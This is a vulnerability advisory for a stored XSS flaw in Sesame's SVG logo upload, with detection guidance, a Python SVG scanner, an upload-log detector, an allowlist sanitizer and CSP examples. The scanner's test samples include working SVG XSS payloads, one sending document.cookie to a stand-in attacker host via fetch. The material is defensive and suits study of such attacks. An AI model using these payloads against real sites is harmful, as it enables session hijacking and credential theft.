CVE-2025-41084 Overview
CVE-2025-41084 is a stored Cross-Site Scripting (XSS) vulnerability in the Sesame web application caused by improper sanitization of uploaded SVG images. An attacker embeds a script in an SVG file and uploads it through a POST request using the logo parameter of /api/v3/companies/<ID>/logo. The malicious SVG is then stored on the server and its script executes in the browser of any user who loads the compromised resource, potentially leading to session hijacking, credential theft, or other malicious actions.
Critical Impact
Attackers can persistently execute malicious JavaScript in victim browsers through crafted SVG uploads, enabling session hijacking and data theft across all users who view the compromised resource.
Affected Products
- Sesame web application (versions unspecified)
Discovery Timeline
- 2026-01-20 - CVE-2025-41084 published to NVD
- 2026-01-20 - Last updated in NVD database
Technical Details for CVE-2025-41084
Vulnerability Analysis
This vulnerability falls under CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically the stored XSS variant. The Sesame web application fails to properly sanitize SVG image uploads, allowing attackers to inject malicious JavaScript code that persists on the server.
SVG files are XML documents, so an SVG can carry JavaScript in <script> elements, in event-handler attributes (onload, onerror, onclick and the rest), in javascript: URLs on the href of an <a> or <use> element (including one swapped in by <animate>), or in HTML placed inside <foreignObject>. Whether that script runs depends on how the browser loads the file: an SVG referenced from an <img> element or a CSS background is rendered without script execution, but an SVG opened directly by URL, or embedded through <object>, <embed> or <iframe>, is loaded as a full document and its scripts run with the privileges of the origin it was served from. An application that stores unsanitized SVG uploads and serves them from its own origin therefore hands every such document-mode load to the attacker's script.
Exploitation requires an authenticated account that can upload a logo via the /api/v3/companies/<ID>/logo endpoint. Once uploaded, the malicious SVG persists on the server and is delivered to every user who loads that company's logo, so a single upload can reach the whole user base of the company. The advisory does not say how Sesame renders the logo; the safe assumption is that at least one code path (a direct link to the logo URL, for instance) loads it as a document, which is what makes this a particularly dangerous stored XSS scenario.
Root Cause
The root cause is insufficient input validation and sanitization of SVG file uploads. The application does not strip or neutralize potentially dangerous elements and attributes within SVG files before storing them. This allows JavaScript code embedded within SVG elements to be preserved and later executed when the file is rendered in a browser context.
Attack Vector
The attack is network-based and requires low-privilege authenticated access to the application. The attacker uploads a maliciously crafted SVG file through the logo upload endpoint. The exploitation flow involves:
- Authenticating to the Sesame web application
- Crafting an SVG file containing malicious JavaScript (e.g., within <script> tags or event handlers)
- Uploading the SVG via POST request to /api/v3/companies/<ID>/logo
- Waiting for victims to access the resource displaying the compromised logo
- The script runs in each victim's browser within the origin that served the SVG, with access to that origin's DOM, its non-HttpOnly cookies and its web storage; when that origin is the application's own, this is the victim's Sesame session
The vulnerability requires user interaction: a victim's browser must load the malicious SVG as a document. Since company logos are typically displayed prominently, the attack surface is broad.
Detection Methods for CVE-2025-41084
Indicators of Compromise
- SVG files containing <script> elements or event-handler attributes (onload, onerror, onclick, onbegin, etc.)
- Unexpected POST requests to /api/v3/companies/*/logo endpoints carrying SVG content, or a body whose declared type (image/png, for example) does not match its bytes (an XML document starting with <?xml or <svg)
- SVG uploads containing <foreignObject>, or <use>, <image> or <animate> elements that reference external resources or javascript: URLs
- CSP violation reports, or unexpected script execution in the browser, originating from the logo URL
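The indicators above turned into a scanner that can be run over the existing uploads, as an added example (not code from Sesame or its vendor). The sample SVGs are constructed, and the element and attribute deny lists are this example's own choices:

```python
"""Denylist scan of SVG files for the indicators listed above.

Added example, not code from Sesame or its vendor; the sample SVGs are constructed.
xml.etree has no defence against entity-expansion bombs, so anything carrying a
DOCTYPE is reported and not parsed (use defusedxml in production).
"""
import re
import xml.etree.ElementTree as ET

XLINK_NS = "http://www.w3.org/1999/xlink"
HREF_ATTRS = {"href", "{%s}href" % XLINK_NS}       # SVG 2 href and legacy xlink:href
SCRIPT_BEARING = {"script", "foreignObject", "iframe", "embed", "object", "handler"}


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return tag.rsplit("}", 1)[-1]


def _norm_url(value):
    """Lowercase and drop whitespace/control chars, defeating 'java\\tscript:' tricks."""
    return re.sub(r"[\s\x00-\x1f]", "", value).lower()


def scan_svg(data):
    """Return a list of findings for one SVG document; empty means nothing suspicious."""
    if re.search(r"<!DOCTYPE", data, re.I):
        return ["DOCTYPE declaration (entity expansion / XXE risk)"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    findings = []
    for el in root.iter():
        name = _local(el.tag)
        if name in SCRIPT_BEARING:
            findings.append("<%s> element" % name)
        if name in ("animate", "set") and el.get("attributeName") in ("href", "xlink:href"):
            findings.append("<%s> animating href (can swap in a javascript: URL)" % name)
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.lower().startswith("on"):
                findings.append("event handler %s on <%s>" % (aname, name))
            if attr in HREF_ATTRS:
                url = _norm_url(value)
                if url.startswith(("javascript:", "vbscript:", "data:text/html")):
                    findings.append("script URL in %s on <%s>" % (aname, name))
                elif url.startswith(("http:", "https:", "//")):
                    findings.append("external reference in %s on <%s>" % (aname, name))
    return findings


def scan_files(paths):
    """Map each path to its findings, e.g. for a sweep over the upload directory."""
    report = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            report[path] = scan_svg(fh.read())
    return report


# Constructed samples: one clean logo and the payload shapes named in the indicators.
BENIGN_LOGO = ('<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">'
               '<circle cx="50" cy="50" r="40" fill="#06c"/>'
               '<text x="50" y="56" text-anchor="middle" font-size="20">S</text></svg>')
MALICIOUS = {
    "script": '<svg xmlns="http://www.w3.org/2000/svg"><script>'
              'fetch("//attacker.invalid/?c="+document.cookie)</script></svg>',
    "onload": '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>',
    "foreignObject": '<svg xmlns="http://www.w3.org/2000/svg"><foreignObject>'
                     '<body xmlns="http://www.w3.org/1999/xhtml" onload="alert(1)"/>'
                     '</foreignObject></svg>',
    "animated href": '<svg xmlns="http://www.w3.org/2000/svg"><a><animate '
                     'attributeName="href" values="javascript:alert(1)"/></a></svg>',
    "obfuscated xlink": '<svg xmlns="http://www.w3.org/2000/svg" '
                        'xmlns:xlink="http://www.w3.org/1999/xlink">'
                        '<a xlink:href="java&#9;script:alert(1)"/></svg>',
    "external use": '<svg xmlns="http://www.w3.org/2000/svg">'
                    '<use href="https://attacker.invalid/x.svg#p"/></svg>',
}

if __name__ == "__main__":
    for label, svg in MALICIOUS.items():
        print("%-16s %s" % (label, scan_svg(svg)))
```

The scan deliberately normalises href values before matching, because an XML entity such as &#9; (a tab) inside "javascript:" survives a naive substring search but is stripped by the browser's URL parser. A denylist like this is a hunting tool for existing files; it is not a substitute for allowlist sanitization of new uploads.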
Detection Strategies
- Deliver a Content Security Policy with the SVG response itself (for example script-src 'none' plus a report-to or report-uri directive): the policy on the HTML page does not govern an SVG the browser loads as a separate document, but a policy on the SVG response both blocks its inline scripts and reports attempts to run them
- Monitor web application logs for suspicious logo upload activity, particularly SVG files from unexpected sources
- Deploy web application firewall (WAF) rules to inspect SVG uploads for malicious patterns
- Utilize browser-based XSS detection tools during security testing to identify stored XSS vulnerabilities
Monitoring Recommendations
- Enable detailed logging for all file upload endpoints, capturing file types, content hashes, and user context
- Set up alerts for SVG uploads containing potentially dangerous XML elements or attributes
- Monitor for unusual patterns in logo access, such as high-frequency requests that may indicate exploitation
- Review authentication logs for accounts uploading suspicious files
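The upload-endpoint logging recommended above, turned into a detector, as an added example (not Sesame code). It assumes a JSON-lines audit log whose field names (ts, user, method, path, content_type, filename, and head for the first bytes of the body) are this example's own; the log entries are constructed:

```python
"""Flag suspicious logo uploads in an upload-audit log.

Added example, not Sesame code. Assumes a JSON-lines audit log with the fields
shown in the constructed sample (ts, user, method, path, content_type,
filename, head = first bytes of the body); the field names are this example's.
"""
import json
import re
from collections import Counter

LOGO_PATH = re.compile(r"^/api/v3/companies/[^/]+/logo$")
SVG_TYPES = {"image/svg+xml", "image/svg", "text/xml", "application/xml"}


def is_logo_upload(event):
    """True for a POST to the company-logo endpoint named in the advisory."""
    return event.get("method") == "POST" and bool(LOGO_PATH.match(event.get("path", "")))


def looks_like_svg(head):
    """True if the first bytes of the body are XML/SVG, whatever the declared type."""
    h = head.lstrip().lower()
    return h.startswith("<?xml") or h.startswith("<svg") or "<svg" in h[:200]


def classify(event):
    """Return the reasons one upload event deserves attention; empty means benign."""
    reasons = []
    if not is_logo_upload(event):
        return reasons
    ctype = event.get("content_type", "").split(";")[0].strip().lower()
    fname = event.get("filename", "").lower()
    if ctype in SVG_TYPES or fname.endswith((".svg", ".svgz")):
        reasons.append("SVG logo upload")
    if looks_like_svg(event.get("head", "")) and ctype not in SVG_TYPES:
        reasons.append("body is SVG but declared as %s" % (ctype or "unknown"))
    return reasons


def detect(lines, burst_threshold=3):
    """Run classify() over JSON lines and also flag an account that hits the logo
    endpoint burst_threshold times within the lines given. Returns [(event, reasons)]."""
    uploads_by_user = Counter()
    alerts = []
    for line in lines:
        event = json.loads(line)
        reasons = classify(event)
        if is_logo_upload(event):
            uploads_by_user[event.get("user")] += 1
            if uploads_by_user[event.get("user")] == burst_threshold:
                reasons.append("%d logo uploads by one account" % burst_threshold)
        if reasons:
            alerts.append((event, reasons))
    return alerts


# Constructed sample: one legitimate PNG logo, then an account that uploads SVG
# openly, then SVG disguised as PNG, then a third logo upload to another company.
SAMPLE_EVENTS = [
    {"ts": "2026-01-21T09:00:01Z", "user": "alice", "method": "POST",
     "path": "/api/v3/companies/42/logo", "content_type": "image/png",
     "filename": "logo.png", "head": "\x89PNG\r\n\x1a\n"},
    {"ts": "2026-01-21T09:05:12Z", "user": "mallory", "method": "POST",
     "path": "/api/v3/companies/42/logo", "content_type": "image/svg+xml",
     "filename": "logo.svg", "head": "<svg xmlns=\"http://www.w3.org/2000/svg\" onload="},
    {"ts": "2026-01-21T09:05:40Z", "user": "mallory", "method": "POST",
     "path": "/api/v3/companies/42/logo", "content_type": "image/png",
     "filename": "logo.png", "head": "<?xml version=\"1.0\"?><svg><script>"},
    {"ts": "2026-01-21T09:06:00Z", "user": "bob", "method": "GET",
     "path": "/api/v3/companies/42/logo", "content_type": "", "filename": "", "head": ""},
    {"ts": "2026-01-21T09:07:30Z", "user": "mallory", "method": "POST",
     "path": "/api/v3/companies/7/logo", "content_type": "image/svg+xml",
     "filename": "a.svg", "head": "<svg"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for event, reasons in detect(SAMPLE_LOG):
        print(event["ts"], event["user"], "; ".join(reasons))
```

Logging the first bytes of the body is what makes the second rule possible: a declared content type is attacker-controlled, the leading bytes are not, and a mismatch between them is a stronger signal than an SVG upload on its own.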
How to Mitigate CVE-2025-41084
Immediate Actions Required
- Audit all existing SVG files in the application for malicious content and remove any compromised uploads
- Implement server-side SVG sanitization before storing uploads, using an allowlist of permitted elements and attributes rather than a denylist of known-bad ones; libraries that take this approach include DOMPurify (configured for an SVG-only profile) and svg-sanitizer
- Consider converting SVG uploads to a raster format (PNG, JPEG) to eliminate script execution risk; the rasterizer then parses attacker-controlled XML itself, so run it in an isolated, resource-limited process
- Deploy Content Security Policy headers on the application's pages and, separately, on the SVG responses themselves, since a browser loading an SVG as a document applies the policy delivered with that SVG, not the one on the page
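An allowlist sanitizer of the kind the second item calls for, as an added example (not Sesame's code, and not DOMPurify or svg-sanitizer). The allowlists are this example's own guess at what a static logo needs, and the sample documents are constructed:

```python
"""Allowlist sanitizer for SVG logo uploads, run server-side before storage.

Added example, not code from Sesame or its vendor. The allowlists are this
example's own guess at what a static company logo needs; anything outside them
(scripts, event handlers, style, foreignObject, external references) is dropped
rather than "fixed". xml.etree has no defence against entity-expansion bombs,
so a DOCTYPE is rejected before parsing (use defusedxml in production).
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)            # serialize as xmlns="..." not ns0:
HREF_ATTRS = {"href", "{%s}href" % XLINK_NS}

ALLOWED_ELEMENTS = {
    "svg", "g", "defs", "title", "desc", "symbol", "use", "path", "rect", "circle",
    "ellipse", "line", "polyline", "polygon", "text", "tspan", "linearGradient",
    "radialGradient", "stop", "clipPath", "mask",
}
ALLOWED_ATTRS = {
    "id", "class", "x", "y", "x1", "y1", "x2", "y2", "cx", "cy", "r", "rx", "ry",
    "width", "height", "viewBox", "preserveAspectRatio", "d", "points", "transform",
    "fill", "fill-opacity", "fill-rule", "stroke", "stroke-width", "stroke-linecap",
    "stroke-linejoin", "stroke-opacity", "opacity", "offset", "stop-color",
    "stop-opacity", "gradientUnits", "gradientTransform", "clip-path", "mask",
    "font-family", "font-size", "font-weight", "text-anchor", "href",
}
LOCAL_REF = re.compile(r"#[\w.-]+")           # href="#id": same-document only
LOCAL_URL = re.compile(r"url\(#[\w.-]+\)")    # fill="url(#gradient)": same-document only


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return tag.rsplit("}", 1)[-1]


def _clean(el):
    """Rebuild el keeping only allowlisted children and attributes; None if dropped."""
    if _local(el.tag) not in ALLOWED_ELEMENTS:
        return None
    new = ET.Element(el.tag)
    for attr, value in el.attrib.items():
        if attr.startswith("{") and attr not in HREF_ATTRS:
            continue                                  # foreign-namespace attributes
        if _local(attr) not in ALLOWED_ATTRS:
            continue                                  # drops on*, style, xml:* ...
        if "url(" in value.lower() and not LOCAL_URL.fullmatch(value.strip()):
            continue                                  # no external paint servers
        if attr in HREF_ATTRS:
            if not LOCAL_REF.fullmatch(value.strip()):
                continue                              # no javascript:, data:, http(s):
            attr = "href"                             # normalise xlink:href to href
        new.set(attr, value)
    new.text, new.tail = el.text, el.tail
    for child in el:
        kept = _clean(child)
        if kept is not None:
            new.append(kept)
    return new


def sanitize_svg(data):
    """Return the sanitized document as a string; raise ValueError if unusable."""
    if re.search(r"<!DOCTYPE", data, re.I):
        raise ValueError("DOCTYPE not allowed in uploads")
    root = ET.fromstring(data)
    if root.tag != "{%s}svg" % SVG_NS:
        raise ValueError("root element is not an <svg> in the SVG namespace")
    return ET.tostring(_clean(root), encoding="unicode")


# Constructed samples: a realistic logo and two payloads of the kind described above.
BENIGN_LOGO = (
    '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">'
    '<defs><linearGradient id="g"><stop offset="0" stop-color="#06c"/>'
    '<stop offset="1" stop-color="#0c6"/></linearGradient></defs>'
    '<circle cx="50" cy="50" r="40" fill="url(#g)"/>'
    '<text x="50" y="56" text-anchor="middle" font-size="20">S</text></svg>'
)
ONLOAD_PAYLOAD = ('<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">'
                  '<rect width="1" height="1"/><script>alert(1)</script></svg>')
XLINK_PAYLOAD = ('<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
                 '<use xlink:href="#ok"/><use xlink:href="javascript:alert(1)"/></svg>')

if __name__ == "__main__":
    print(sanitize_svg(ONLOAD_PAYLOAD))
    print(sanitize_svg(XLINK_PAYLOAD))
```

The design choice worth copying is that the sanitizer never inspects a value to decide whether it is "bad": an attribute not on the allowlist is gone, and an href that is not a same-document fragment is gone, so obfuscated javascript: URLs, data: URLs and external references all fall out of the same rule. The price is that a legitimate logo using an element outside the list (a <style> block, a <filter>) is silently simplified; widen the list deliberately when that happens, not by reflex.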
Patch Information
Refer to the INCIBE security notice for official vendor guidance and patch information. Organizations should contact the Sesame application vendor for specific patch availability and upgrade instructions.
Workarounds
- Block SVG file uploads entirely until proper sanitization is implemented
- Serve uploaded files from a separate, cookie-less origin (a dedicated uploads domain) so that any script that does run cannot reach the application's session; additionally sending Content-Disposition: attachment with SVG responses makes a direct visit to the logo URL download the file instead of rendering it
- Send a Content Security Policy with the SVG responses themselves (script-src 'none', or the sandbox directive) to block inline scripts; a script-src 'self' policy on the HTML pages does not apply to an SVG the browser loads as its own document
- Convert all SVG uploads to PNG or other safe raster formats server-side before storage
# Example Content Security Policy header for the application's HTML pages (Apache).
# It governs the pages only; an SVG loaded as its own document needs a policy on
# the SVG response. object-src 'none' also stops pages embedding an uploaded SVG
# through <object>/<embed>, one of the ways an SVG gets loaded with scripting on.
Header always set Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; img-src 'self' data:;"
# Example SVG-specific headers for nginx, delivered with the SVG response itself.
# Caveats: add_header in a location replaces add_header directives inherited from
# the server block, so restate site-wide headers here; and the logo route in this
# advisory (/api/v3/companies/<ID>/logo) has no .svg suffix, so match that path.
location ~* \.svg$ {
    add_header Content-Security-Policy "script-src 'none'";
    add_header X-Content-Type-Options "nosniff";
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

